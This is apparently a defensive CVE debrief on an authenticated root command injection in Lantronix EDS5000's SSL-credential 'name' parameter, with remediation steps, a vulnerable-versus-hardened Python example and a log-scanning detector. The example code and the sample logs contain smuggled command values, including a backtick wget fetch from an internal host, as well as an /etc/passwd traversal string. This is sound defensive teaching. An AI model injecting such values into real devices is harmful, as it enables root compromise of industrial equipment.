PatchSiren cyber security CVE debrief

CVE-2025-67034 Lantronix CVE debrief

CVE-2025-67034 affects Lantronix EDS5000 2.1.0.0R3 (the product list below also names EDS3000PS 3.1.0.0R2) and is described by CISA as an authenticated OS command injection in the management interface. The flaw is triggered when deleting SSL credentials via the "name" parameter, and the injected commands execute with root privileges. Lantronix recommends upgrading EDS5000 to 2.2.0.0R1.

Vendor
Lantronix
Product
Lantronix EDS3000PS 3.1.0.0R2; Lantronix EDS5000 2.1.0.0R3
CVSS
7.2 High (CVSS v3.1, AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
CISA KEV
Not listed in stored evidence
Original CVE published
2026-03-10
Original CVE updated
2026-03-10
Advisory published
2026-03-10
Advisory updated
2026-03-10

Who should care

Organizations operating Lantronix EDS5000 devices (and EDS3000PS devices, which the product list also names), especially OT/ICS teams, network administrators, and security teams responsible for privileged management access and firmware maintenance.

Technical summary

The CISA advisory states that an authenticated attacker can inject OS commands through the "name" parameter when deleting SSL credentials via the management interface, and that the injected commands run with root privileges. The CVSS v3.1 vector is AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2, High): the flaw is reachable over the network with low attack complexity and no user interaction, but it requires a high-privileged (administrator-level) account on the device, which is what keeps the score below critical. Scope is unchanged and the confidentiality, integrity and availability impacts are all rated high, consistent with root-level command execution on the device itself. The practical reading: any shared, weakly protected or compromised administrator credential becomes full control of the device.
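To make the bug class concrete, the following is an added illustration of the pattern the advisory describes (a request parameter spliced into a shell command line) beside a hardened replacement that never invokes a shell. This is example code written for this debrief, not Lantronix firmware; the credential directory layout, the ".pem" naming and the function names are assumptions.

```python
"""Injectable 'delete SSL credential' handler beside a hardened one.

Added example, not Lantronix code. The credential store layout, the
".pem" file naming and the function names are assumptions.
"""
import os
import re
import subprocess
import tempfile

# Allowlist for a credential name: one path component, conservative charset,
# at most 64 characters. No '/', no whitespace, no shell metacharacters.
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def vulnerable_delete(name: str, cred_dir: str, dry_run: bool = True) -> str:
    """Injectable pattern: the request's 'name' value is spliced into a shell
    command line. With shell=True the shell parses ';', '|', '`', '$(...)'
    and newlines inside 'name', so "web; id" becomes two commands, run with
    the daemon's privileges (root, per the advisory). Returns the command
    string and only executes it when dry_run is False."""
    cmd = f"rm -f {cred_dir}/{name}.pem"
    if not dry_run:
        subprocess.run(cmd, shell=True, check=False)
    return cmd


def validate_credential_name(name: str) -> bool:
    """Allowlist check; anything not matching is rejected outright."""
    return NAME_RE.fullmatch(name) is not None


def hardened_delete(name: str, cred_dir: str) -> str:
    """No shell at all: validate the name, build the path, unlink directly."""
    if not validate_credential_name(name):
        raise ValueError(f"rejected credential name: {name!r}")
    store = os.path.realpath(cred_dir)
    path = os.path.realpath(os.path.join(store, name + ".pem"))
    # Defence in depth: even if the allowlist is loosened later, refuse any
    # path (including a symlink target) that resolves outside the store.
    if os.path.dirname(path) != store:
        raise ValueError("path escapes credential store")
    os.unlink(path)
    return path


def demo() -> dict:
    """Constructed scenario: a temporary store holding one credential, a benign
    request and an injected request against each implementation."""
    store = tempfile.mkdtemp(prefix="creds-")
    open(os.path.join(store, "web-cert.pem"), "w").close()
    injected = "web-cert.pem; id"
    result = {
        "vulnerable_cmd": vulnerable_delete(injected, store),  # dry run only
        "benign_accepted": validate_credential_name("web-cert"),
        "injected_accepted": validate_credential_name(injected),
        "traversal_accepted": validate_credential_name("../../etc/shadow"),
    }
    try:
        hardened_delete(injected, store)
        result["hardened_blocked"] = False
    except ValueError:
        result["hardened_blocked"] = True
    hardened_delete("web-cert", store)
    result["benign_deleted"] = not os.path.exists(os.path.join(store, "web-cert.pem"))
    os.rmdir(store)
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The hardened version fixes the class of bug rather than a single payload: there is no shell to parse metacharacters, the name is allowlisted rather than denylisted, and the realpath check catches traversal or symlink tricks that a later relaxation of the allowlist might let through.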

Defensive priority

High. Prioritize affected EDS5000 deployments whose management interface is reachable from user or shared networks, or whose administrator accounts are shared, weakly protected or used by third parties, since a single administrator login is all that stands between an attacker and root-level command execution on the device.

Recommended defensive actions

  • Upgrade affected Lantronix EDS5000 systems to version 2.2.0.0R1 as recommended in the advisory. The advisory text supplied here gives a fix version only for EDS5000; confirm the remediation status of EDS3000PS 3.1.0.0R2 with Lantronix or CISA separately.
  • Restrict management-interface access to trusted administrative networks (for example a dedicated management VLAN or jump host) and to named administrator accounts; do not expose it to user networks or the internet.
  • Review privileged account usage, remove unnecessary administrative access, and rotate any administrator credentials that may have been shared or exposed, since the flaw is only reachable with such an account.
  • Monitor for unexpected command execution or configuration changes on affected devices, including credential-deletion requests whose "name" value contains shell metacharacters or path separators, and for unexpected outbound connections from the device.
  • Apply general ICS hardening and access-control guidance from CISA for industrial control environments.
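The monitoring item above can be turned into an offline triage check. The following is an added example, not a CISA or Lantronix artefact: it walks management-interface request logs, decodes the query string, and flags any "name" parameter carrying shell metacharacters, newlines, or path components. The log format (Apache combined style), the sample lines and the "/mgmt/ssl" request path are all constructed; the advisory names only the parameter, not the endpoint, so the check keys on the parameter name alone.

```python
"""Triage of management-interface request logs for injection attempts in a
'name' parameter. Added example; log format, request path and sample lines
are constructed and are not real device logs."""
import re
from urllib.parse import parse_qsl, urlsplit

# Things a credential name never needs but a shell or traversal attempt does.
# Checked after URL decoding, so %3B, %0A and %2F are caught too.
SUSPICIOUS = [
    ("shell-metachar", re.compile(r"[;|&`$<>(){}]")),
    ("newline", re.compile(r"[\r\n]")),
    ("path-traversal", re.compile(r"\.\.")),
    ("path-separator", re.compile(r"[/\\]")),
]

# Constructed Apache combined-style lines (assumed format, not device output).
SAMPLE_LOG = """\
10.0.0.5 - admin [10/Mar/2026:09:12:01 +0000] "POST /mgmt/ssl?action=delete&name=web-cert HTTP/1.1" 200 312
10.0.0.7 - admin [10/Mar/2026:09:13:44 +0000] "POST /mgmt/ssl?action=delete&name=web-cert%3Bid%3E%2Ftmp%2Fo HTTP/1.1" 200 312
10.0.0.7 - admin [10/Mar/2026:09:14:02 +0000] "POST /mgmt/ssl?action=delete&name=x%60wget+http%3A%2F%2F10.0.0.7%2Fa%60 HTTP/1.1" 200 312
10.0.0.9 - admin [10/Mar/2026:09:15:30 +0000] "GET /mgmt/status HTTP/1.1" 200 88
10.0.0.9 - admin [10/Mar/2026:09:16:10 +0000] "POST /mgmt/ssl?action=delete&name=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 312
"""

REQ_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def suspicious_reasons(value: str) -> list:
    """Return the labels of every pattern the decoded value trips."""
    return [label for label, rx in SUSPICIOUS if rx.search(value)]


def scan_log(text: str, param: str = "name") -> list:
    """Return one finding per request whose `param` value looks injected."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQ_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key != param:
                continue
            reasons = suspicious_reasons(value)
            if reasons:
                findings.append({
                    "line": lineno, "src": m["src"], "user": m["user"],
                    "ts": m["ts"], "value": value, "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['src']} user={f['user']} "
              f"name={f['value']!r} -> {', '.join(f['reasons'])}")
```

Because the vulnerable request is authenticated, every hit carries a valid administrator username; treat that account as compromised and pivot to the rotation step above rather than only blocking the source address. If the device logs form bodies rather than query strings, feed the decoded body to parse_qsl the same way.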

Evidence notes

This debrief is based on the supplied CISA CSAF advisory for ICSA-26-069-02 and its remediation guidance. The advisory explicitly describes authenticated OS command injection in the "name" parameter when deleting SSL credentials and states that injected commands execute with root privileges. The source also recommends upgrading EDS5000 firmware to 2.2.0.0R1. No additional exploitation details are included here.

Official resources

Publicly disclosed by CISA on 2026-03-10 as ICSA-26-069-02 / CVE-2025-67034.